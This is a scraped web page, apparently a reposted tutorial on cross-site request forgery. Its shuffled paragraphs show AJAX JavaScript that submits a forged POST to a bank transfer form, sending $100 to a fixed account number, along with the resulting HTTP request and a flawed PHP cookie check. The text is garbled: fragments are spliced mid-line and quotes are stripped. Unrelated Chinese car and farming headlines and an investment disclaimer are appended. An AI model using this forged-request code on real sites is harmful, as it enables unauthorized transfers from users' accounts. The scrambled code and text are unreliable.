with the AJAX we can to send request(packet request) performed by the browser itself. This means all the cookies and sessions of the user sent with the request(Unlike server-side language) So if there is a form that is used on bank site to money transfer. We can send POST request to a form using AJAX and the request is approved by the site system, With CSRF attack we can to send a fake request from the browser of the user。
as you can see the php script check if its valid cookies and without additional filtering operation approved the transfer. This means that if we have the cookies we need only to send fake request to system with the cookies of the user and the system is approved the transfer. AJAX: Code: script type=text/javascript var http = GetXmlHttpObject(); if(http != null) { var url = ; //Attacking form address var pack = money=100Baccount=0123456789send=Submit; http.open(POST, url, requests sent AJAX are sent from the browser itself so we do not have to worry about to get the cookies of the user. So even though we sent only the POST in the request sent to the server youll see something like this: Code: POST /file.php HTTP/1.1 \r\n Host: \r\n Cookie: id=...; password=..; \r\n Connection: Close \r\n Content-Type: application/x-www-form-urlencoded \r\n Content-Length: .... \r\n\r\n money=100Baccount=0123456789send=Submit Once returned from the server 200(request was received successfully) transferred $100 from the user account to account number 0123456789. And so the CSRF attack works, and thus enter to site with the permission of the user and maintain interact with the site like the script is the user himself. A great example of using on CSRF, close); http.send(params); } function GetXmlHttpObject() { if(window.XMLHttpRequest) { return new XMLHttpRequest(); } if(window.ActiveXObject) { return new ActiveXObject(Microsoft.XMLHTTP); } return null; } /script As already explained。
is bank site after the user connects to site created cookies on his computer(Role of the cookies is save the data). From this moment any action performed from the user browser approved by the site system. Here comes in the AJAX technology, Good bye... 摘自 , because all the cookies of the user browser sent with the AJAX request Example for CSRF exploit html: Code: form action= method=post name=transfer Amount of money to transfer: label input type=text name=money id=money /$ /label br / For bank account: label input type=text name=Baccount id=Baccount / /label p label input type=submit name=send id=send value=Submit / /label /p /formphp: Code: ?php if(isset($_POST[send]) { if(is_numeric($_COOKIE[id] isset($_COOKIE[password]) { if(..) { //if is valid cookies //transfer } else { //if is invalid cookies //blocking } } } ? Whats the risk here?, pack.length); http.setRequestHeader(Connection, application/x-www-form-urlencoded); http.setRequestHeader(Content-length, true); http.setRequestHeader(Content-type,。
✽本文资讯仅供参考,并不构成投资或购买等决策建议。
推荐阅读:
最近在各种卡友群里面,聊的最多的话题无疑是三一重卡了.关于它的超低售价、售后问...
人都是念旧的,2018 来了好几天,我们却还是习惯想着从前。特别是这两天,各种 2017 年的总结,刷爆大家的朋友圈。
□本报记者丁需学 郏县是红牛之乡,郏县把红牛产业作为农民增收致富的重要产业、乡村振兴的主导产业、县域经济的支柱产业,走“全链、专营、高端、品牌”的发展之
易车讯 在刚刚开幕的 2021 上海车展上,一汽 - 大众捷达带来了捷达 VS5 三十周年纪念版车型,新车整体的外观设计与
[ 爱卡汽车 国内新车 原创 ] 日前我们从相关渠道获悉,一汽 - 大众捷达三款新车将在今年上海车展期间正式上市,三